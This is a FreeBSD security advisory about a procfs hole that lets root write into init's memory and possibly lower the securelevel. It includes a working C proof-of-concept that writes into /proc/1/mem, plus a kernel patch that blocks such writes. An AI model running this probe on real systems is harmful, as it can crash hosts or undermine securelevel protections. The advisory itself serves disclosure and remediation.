COMMAND

    procfs

SYSTEMS AFFECTED

    FreeBSD

PROBLEM

    Brian Mitchell posted the following.  There is a slight procfs hole
    that could allow an intruder to lower the securelevel.  init's
    memory is not protected, so you can overwrite data/instructions
    in init and possibly lower the securelevel (although panicking the
    system is much more likely).  Enclosed is a vulnerability checker:

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <fcntl.h>

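    /*
     * Probe for the procfs hole described in this advisory: try to write one
     * int into init's (pid 1) address space through /proc/1/mem.  A write
     * that transfers bytes means the mem node is not protected.  The probe
     * really does modify init's memory at offset 0x1000, so the advisory's
     * warning about a likely panic applies to running it.
     *
     * Exit status: 0 probe ran and the result was printed, 1 not root,
     * 2 open failed, 3 lseek failed.
     */
    int main(void)
    {
            int tqbf = 31337;       /* value written into init's memory */
            int fd;
            ssize_t g0nz0;          /* write(2) result; the original stored it in an int */

            /* refuse to run unprivileged, as the original did */
            if (getuid()) {
                    fprintf(stderr, "this attack needs root\n");
                    exit(1);
            }
            fd = open("/proc/1/mem", O_RDWR);
            if (fd < 0) {
                    fprintf(stderr, "open of /proc/1/mem failed\n");
                    exit(2);
            }
            /* the original left lseek unchecked; a failed seek would have
             * written at whatever offset the descriptor was left at */
            if (lseek(fd, 0x1000, SEEK_SET) == (off_t)-1) {
                    fprintf(stderr, "lseek on /proc/1/mem failed\n");
                    close(fd);
                    exit(3);
            }
            g0nz0 = write(fd, &tqbf, sizeof tqbf);
            close(fd);
            /* only a write that actually transferred bytes proves the hole;
             * the original's ">= 0" also reported a zero-byte write as vulnerable */
            if (g0nz0 > 0)
                    fprintf(stderr, "procfs is vulnerable!\n");
            else
                    fprintf(stderr, "procfs is not vulnerable!\n");
            printf("returned %zd\n", g0nz0);
            return 0;
    }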

SOLUTION

    Here is a simple patch; it disallows writes to pid 1's mem node if
    securelevel is > 0 (the diff is based on a 2.2.1 box with the
    securelevel fix applied):

    *** procfs_mem.c        Sat Sep  6 02:36:39 1997
    --- procfs_mem.c.new    Sat Sep  6 02:38:25 1997
    ***************
    *** 316,321 ****
    --- 316,325 ----
                !(curp->p_cred->pc_ucred->cr_gid == KMEM_GROUP &&
                  uio->uio_rw == UIO_READ))
                    return EPERM;
    +
    +       /* writing to init memory while securelevel > 0 is bad */
    +       if(uio->uio_rw == UIO_WRITE && p->p_pid == 1 && securelevel > 0)
    +               return EPERM;

            error = procfs_rwmem(p, uio);